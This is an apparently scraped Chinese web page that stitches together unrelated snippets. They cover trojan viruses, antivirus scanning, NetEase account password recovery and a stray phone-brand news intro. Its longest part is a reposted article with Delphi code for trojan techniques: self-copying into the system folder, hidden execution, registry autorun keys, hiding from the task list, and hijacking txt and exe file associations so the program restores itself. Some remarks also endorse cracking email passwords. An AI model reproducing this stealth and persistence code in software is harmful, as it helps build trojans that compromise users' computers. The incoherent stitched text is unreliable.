如果知道木马的名字特征,可以到杀毒软件网站信息中心去举报或到杀毒软件论坛去发帖举报。
在他的头像上点右键
有一个“举报此用户” 再根据系统的选项选择举报的项目,点击“确定”就ok了
联系转转平台的客服,通过客服举报,如果被骗的钱很多的话,直接报警。
木马病毒是指通过特定的程序(木马程序)来控制另一台计算机。那么你对木马病毒了解多少呢?以下是由我整理关于什么是木马病毒的内容,希望大家喜欢!
木马病毒的详细含义
“木马”与计算机网络中常常要用到的远程控制软件有些相似,但由于远程控制软件是“善意”的控制,因此通常不具有隐蔽性;“木马”则完全相反,木马要达到的是“偷窃”性的远程控制,如果没有很强的隐蔽性的话,那就是“毫无价值”的。
首先打开电脑管家,在界面内找到“病毒查杀”,点击“闪电杀毒”。
选择“快速查杀”,开始检测电脑中是否存在安全问题。等待片刻,在查杀结果中把病毒清理即可。
木马(Trojan)这个名字来源于古希腊传说(荷马史诗中木马计的故事,Trojan一词的特洛伊木马本意是特洛伊的,即代指特洛伊木马,也就是木马计的故事)。
“木马”程序是目前比较流行的病毒文件,与一般的病毒不同,它不会自我繁殖,也并不“刻意”地去感染其他文件,它通过将自身伪装吸引用户下载执行。
你好!木马可以通过在视频文件
中嵌入木马程序。当打开视频文件时,隐藏在其中的木马会将其中的恶意程序下载到Windows系统文件夹下,并且会修改注册表信息,以达到能够自启动的效果,这样每当用户开机是,恶意程序就会自动的启动运行。谢谢。
先说楼主的误区,单纯下载WMV格式的视频文件,是不会感染木马的,前提是你确定你下载的是【视频文件】,而不是其他类型的文件。例如文件名叫【2013.wmv.exe】这种文件实际上不是wmv文件,而是一个exe的程序。其实中毒最大的原因,并不是你下载的视频有问题,而是你浏览的【网页网站有问题】,还有网站网页建议你用他们提供的【下载播放器】,然后才能下载他们的WMV视频文件或是其他的文件,这个【播放器】只要你下载安装了,那你就中毒了。
追忆软件你有听说过吗?他就是用来破解这些邮箱类的密码,我当时就是这样破解找回的
用手机绑定了吗?用手机找 网易因为很多游戏在其中,所以安全性要求很高,最少比一般性免费的邮箱要高点安全等级。忘记密码很麻烦。网易有一个安全码不知道你记得不?估计你也是记不得了。你填写的资料是正确的还好说,可以找网易公司客服。不正确哪就很难再找到。除非有高手破解,且在你以前上过邮箱的本地计算机中,找人帮你破解吧。只有这样才快。 6种方法:通过生日和密码提示问题/答案第一步: 在通行证首页点击“忘记密码”,进入密码修复页面。 第二步: 根据页面提示,输入您的用户名和生日,点击“下一步”按钮; 第三步: 根据页面提示,回答密码提示问题,输入新密码和校验码,点击“下一步”按钮; 温馨提示:如果您是将军令用户,您需要输入将军令的动态密码才可以完成修改密码的操作。如果您是电话密保用户,您需要通过已绑定电话的验证才能够完成修改密码的操作。如果您是手机密保(梦幻密保或大话密保)用户,为了您的帐号安全,在修改密码前,您需要编写短信发送相关指令才能够完成修改密码的操作。移动用户:编辑短信TYXG[空格]您的用户名发送到163093联通用户:编辑短信TYXG[空格]您的用户名发送到916393浙江联通用户:编辑短信TYXG[空格]您的用户名发送到316393网通小灵通用户:编辑短信TYXG[空格]您的用户名发送到9163093“大话密保”用户请发以下指令同意修改密码:移动用户:编辑短信TYXG[空格]您的用户名发送到163092联通用户:编辑短信TYXG[空格]您的用户名发送到916392浙江联通用户:编辑短信TYXG[空格]您的用户名发送到316392网通小灵通用户:编辑短信TYXG[空格]您的用户名发送到9163092第四步: 提交成功,完成新密码设置。 通过安全码第一步: 在通行证首页点击“忘记密码”,进入密码修复页面,再点击“通过安全码”进入通过安全码取回密码页面。 第二步: 根据页面提示,输入您的用户名和安全码,输入新密码,点击“下一步”按钮; 温馨提示:如果您是将军令用户,您需要输入将军令的动态密码才可以完成修改密码的操作。如果您是电话密保用户,您需要通过已绑定电话的验证才能够完成修改密码的操作。如果您是手机密保(梦幻密保或大话密保)用户,为了您的帐号安全,在修改密码前,您需要编写短信发送相关指令才能够完成修改密码的操作。移动用户:编辑短信TYXG[空格]您的用户名发送到163093联通用户:编辑短信TYXG[空格]您的用户名发送到916393浙江联通用户:编辑短信TYXG[空格]您的用户名发送到316393网通小灵通用户:编辑短信TYXG[空格]您的用户名发送到9163093“大话密保”用户请发以下指令同意修改密码:移动用户:编辑短信TYXG[空格]您的用户名发送到163092联通用户:编辑短信TYXG[空格]您的用户名发送到916392浙江联通用户:编辑短信TYXG[空格]您的用户名发送到316392网通小灵通用户:编辑短信TYXG[空格]您的用户名发送到9163092第三步: 提交成功,完成新密码设置。 通过关联手机通过保密邮箱第一步: 在通行证首页点击“忘记密码”,进入密码修复页面。再点击“通过保密邮箱”进入通过保密邮箱取回密码页面。 第二步: 根据页面提示,输入您的用户名和保密邮箱,点击“下一步”按钮。提交成功,我们会给您的保密邮箱中发送一封设置新登录密码的确认邮件; 第三步: 登录您的保密邮箱,请您根据邮件中的提示,点击修改密码的链接,并在三天内重新设置密码; 第四步: 填写您的通行证用户名和新密码,点击“下一步”按钮; 第五步: 提交成功,完成新密码设置。 温馨提示:如果您没有收到邮件,或者超过三天有效期,您可以再次请求发送邮件;有些邮箱地址可能会收不到我们发送的确认邮件,建议您采用网易的其他邮箱作为您的保密邮箱,比如:2280兆超大空间网易126免费邮username@126.com,或者提供尊贵服务的网易VIP邮箱。 通过手机密保如果您的手机已经申请大话密保或梦幻密保,并成功绑定游戏角色,您可以通过下述方式直接发送短信修改通行证密码: 移动用户:编辑短信XFMM[空格]新密码发送到163093(梦幻密保)、163092(大话密保) 联通用户:编辑短信XFMM[空格]新密码发送到916393(梦幻密保)、916392(大话密保) 浙江联通用户:编辑短信XFMM[空格]新密码发送到316393(梦幻密保)、316392(大话密保) 网通小灵通用户:编辑短信XFMM[空格]新密码发送到9163093(梦幻密保)、9163092(大话密保) 编辑正确指令发送成功后,您会收到一条密码设置成功的短信,即可使用您设定的新密码登录游戏或网易通行证。(注:对帐号操作的指令XFMM默认是对全部帐号进行操作,如需对指定的某一个帐号进行操作,请在指令后面添加序号,例如XFMM1就是对第一个主绑定帐号修复密码。“修复密码”属于“手机密保”的子功能,无需另外支付费用) 通过网易客服中心如果您无法通过上述方法修复密码,请您和网易客户服务中心联系: 帐号修复支持中心: 密码修复呼出专线:020-83918282(呼出专用,不作接听) 接待地址:广州市天河区工业园建中路59号西座柏朗奴商务大厦7楼 接待时间:9:30-17:00 温馨提醒:请您在上门取回自己帐号时,带齐所有有效的,能证明您帐号的注册资料(本人身份证件原件、该帐号早期消费过的点卡等),我们会仔细核对,为您找回帐号。 如果您是游戏用户,发现他人非法使用您的帐号或利用安全漏洞的情况,请联系游戏客服专用热线: 梦幻西游:020-83918162 大话西游:020-83918161
哈喽黑粉们,欢迎来到黑马公社
不知道大家还记不记得金立这个品牌?
自从破产后,每一次回归大众视野都十分不体面。
上一次是因为金立名下3000多件专利被以近172万元打包拍卖。
怎么说也是老牌手机厂商,也有过一定的江湖地位,落到如此地步,也不禁令人唏嘘嘘吁。
前两天,金立又再一次喜提热搜,当然,也是不好的事情。
要实现木马服务的程序,主要实现以下几个功能:后台的运行(隐藏技术),控制码的接收与注册表的修改,下面对这三方面做介绍:
1、在VC#中,建立一个后台服务程序是很容易的,先建立一个新的C#的Windows应用程序,项目名称自定(不过为了隐藏可使用与系统相近的名称),将窗体属性“ShowInTaskbar”属性设为false,让它运行时不会在任务栏中显示,并将属性“Windowstate”属性设为Mininized即可,这样窗体就可以隐藏运行了。当然你也可以在InitializeComponent()设置,此函数起初始化的作用,在窗体显示前运行,代码如下:
-- 注册表?或者System.ini?
木马是一种基于远程控制的病毒程序,该程序具有很强的隐蔽性和危害性,它可以在人不知鬼不觉的状态下控制你或者监视你。有人说,既然木马这么厉害,那我离它远一点不就可以了!然而这个木马实在是“淘气”,它可不管你是否欢迎,只要它高兴,它就会想法设法地闯到你“家”中来的!哎呀,那还了得,赶快看看自己的电脑中有没有木马,说不定正在“家”中兴风作浪呢!那我怎么知道木马在哪里呢,相信不熟悉木马的菜鸟们肯定想知道这样的问题。下面就是木马潜伏的诡招,看了以后不要忘记采取绝招来对付这些损招哟!
其实做这个很简单的,现在我感觉做木马关键在于创意了 我电脑中收集过的一篇文章,给你参考一下 “冰河”启示录 前言:我经常在杂志和报刊上看到此类标题的文章,但大多是骗稿费的,没有任何技术含量.于是一气之下写了这编东西.本人声明如下:(一)本人对"冰河"及其作者没有任何不满,相反,作者肯帮助初学者的态度是我们每一个人都应该学习的.(二)本文的目的在于交流编程经验,没有任何其它不良企图.(三)在一些领域,我们理应宁可自制力让我们的预见力保持寂寞,也不要去做一个打开潘多拉盒子的先知。所以一些更厉害的方法我们现在不会提,以后也不会.--2000.8.3 (1) “冰河”是有名的用C++Builder编写的国产远程管理软件,其自我的功能保护很强,下面就以Delphi为例谈一谈它的原理,希望对大家有一些启发. 一、程序安装 此类程序一般会把自己隐藏起来运行,通常不外乎以下几种方法:自我拷贝法、资源文件法、网页方式安装、类病毒捆绑法(如YAI).自我拷贝法适用于本身就一个文件,资源文件法可以同时安装好几个文件,网页方式安装要先向M$交钱换安全签证,类病毒捆绑法利用了病毒的原理.本文只介绍自我拷贝法,其它方法请到我的个人主页去看. 1:自我拷贝法 这种方法的原理是程序运行时先查看自己是不是在特定目录下,如果是就继续运行,如果不是就把自己拷贝到特定目录下,然后运行新程序,再退出旧程序. 打开Delphi,新建一个工程,在窗口的Create事件中写代码: procedure TForm1.FormCreate(Sender: TObject); var myname: string; begin myname := ExtractFilename(Application.Exename); //获得文件名 if application.Exename GetWindir + myname then //如果文件不是在Windows\System\那么.. begin copyfile(pchar(application.Exename), pchar(GetWindir + myname), False);{将自己拷贝到Windows\System\下} Winexec(pchar(GetWindir + myname), sw_hide);//运行Windows\System\下的新文件 application.Terminate;//退出 end; end; 其中GetWinDir是自定义函数,起功能是找出Windows\System\的路径. function GetWinDir: String; var Buf: array[0..MAX_PATH] of char; begin GetSystemDirectory(Buf, MAX_PATH); Result := Buf; if Result[Length(Result)]'\' then Result := Result + '\'; end; 另外,为了避免同时运行多个程序的副本(节约系统资源也),程序一般会弄成每次只能运行一个.这又有几种方法. 一种方法是程序运行时先查找有没有相同的运行了,如果有,就立刻退出程序. 修改dpr项目文件,修改begin和end之间的代码如下: begin Application.Initialize; if FindWindow('TForm1','Form1')=0 then begin //当没有找到Form1时执行下面代码 Application.ShowMainForm:=False; //不显示主窗口 Application.CreateForm(TForm1, Form1); Application.Run; end; end. 另一种方法是启动时会先通过窗口名来确定是否已经在运行,如果是则关闭原先的再启动。“冰河”就是用这种方法的。 这样做的好处在于方便升级.它会自动用新版本覆盖旧版本. 方法如下:修改dpr项目文件 uses Forms,windows,messages, Unit1 in 'Unit1.pas' {Form1}; 为了程序能在Windows每次启动时自动运行,可以通过六种途径来实现.“冰河”用注册表的方式。 加入Registry单元,改写上面的窗口Create事件,改写后的程序如下: procedure TForm1.FormCreate(Sender: TObject); const K = '\Software\Microsoft\Windows\CurrentVersion\RunServices'; var myname: string; begin {Write by Lovejingtao, ,Lovejingtao@21cn.com} myname := ExtractFilename(Application.Exename); //获得文件名 if application.Exename GetWindir + myname then //如果文件不是在Windows\System\那么.. begin copyfile(pchar(application.Exename), pchar(GetWindir + myname), False);{//将自己拷贝到Windows\System\下} Winexec(pchar(GetWindir + myname), sw_hide);//运行Windows\System\下的新文件 application.Terminate;//退出 end; with TRegistry.Create do try RootKey := HKEY_LOCAL_MACHINE; OpenKey( K, TRUE ); WriteString( 'syspler', application.ExeName ); finally free; end; end; 为了让程序用ALT+DEL+CTRL看不见,在implementation后添加声明: function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; stdcall; external 'KERNEL32.DLL'; 再在上面的窗口Create事件加上一句:RegisterServiceProcess(GetCurrentProcessID, 1);//隐藏 启示1:当我们中了“冰河”,如果被对方上了密码而无法自己卸载时,可以先找出是什么文件,然后自己配置一个没有密码的来运行,这样它就会把原来有密码的覆盖掉,自己就可以轻松用它的卸载功能把它卸掉.如果你会编程,也可以自己写一个"清除器"了,方法是先查找到窗口名,向它发送退出命令,再把它删除即可. (2) “冰河”的自我功能保护很强,它一般通过Txt或Exe文件关联来达到自我恢复.所以有很多人明明把它杀掉了,但重新启动时又会出现.下面举以Txt文件关联为例. 打开Delphi,新建一个工程,在窗口的Create事件中写代码: uses Registry procedure TForm1.FormCreate(Sender: TObject); const Kkk = '\Software\Microsoft\Windows\CurrentVersion\RunServices'; const K = '\txtfile\shell\open\command'; var sFileName:string; begin //****************************************************** with TRegistry.Create do //写注册表,让程序跟文本文件关联 try RootKey := HKEY_CLASSES_ROOT; OpenKey( K, TRUE ); {Write by Lovejingtao, } WriteString( '', application.ExeName+' "%1" '); {Write by Lovejingtao,lovejingtao@21cn.com} finally free; end; //******************************************************* with TRegistry.Create do //写注册表,每次启动时自动运行 try RootKey := HKEY_LOCAL_MACHINE; OpenKey( Kkk, TRUE ); WriteString( 'myTray', application.ExeName ); finally free; end; //******************************************************** if FileExists(pchar(Getwindir+'Sysplay.exe'))=false then//如果文件已经删除 begin copyfile;//自定义拷贝资源文件过程 winexec(pchar(Getwindir+'Sysplay.exe'),sw_hide); end; //********************************************************** if ParamCount0 then begin (* 有执行参数传入 *) sFileName:=ParamStr(1); (* 取得参数内容 *) winexec(pchar('Notepad.exe '+sFileName),sw_show);(*用记事本打开*) //winexec(pchar( sFileName),sw_show); end; //******************************************************* application.Terminate;//退出 end; 如果要改为与Exe文件关联,只要把"const K = '\txtfile\shell\open\command';"改为 "const K = '\exefile\shell\open\command';",把"winexec(pchar('Notepad.exe '+sFileName),sw_show);" 改为"winexec(pchar( sFileName),sw_show);"即可.当然,还要加入是否退出Windows而运行的Rundll32.dll, 否则会因为关联Exe文件而退不出Windows. 启示2:手工删除“冰河”时,还要改掉它的保护功能,不能让它恢复.如果是关联了文本文件,先改注册表让它不能自动运行,重启后不要打开文本文件,立刻进到其安装目录把它删除.如果是关联了Exe文件,那只有回到Dos下删.切记:一定要把两个文件同时删掉,否则你重启后会发现文件又恢复了
木马(计算机恶意程序)一般指木马病毒
木马病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码,是具备破坏和删除文件、发送密码、记录键盘和攻击Dos等特殊功能的后门程序。木马病毒其实是计算机黑客用于远程控制计算机的程序,将控制程序寄生于被控制的计算机系统中,里应外合,对被感染木马病毒的计算机实施操作。一般的木马病毒程序主要是寻找计算机后门,伺机窃取被控计算机中的密码和重要文件等。可以对被控计算机实施监控、资料修改等非法操作。木马病毒具有很强的隐蔽性,可以根据黑客意图突然发起攻击。
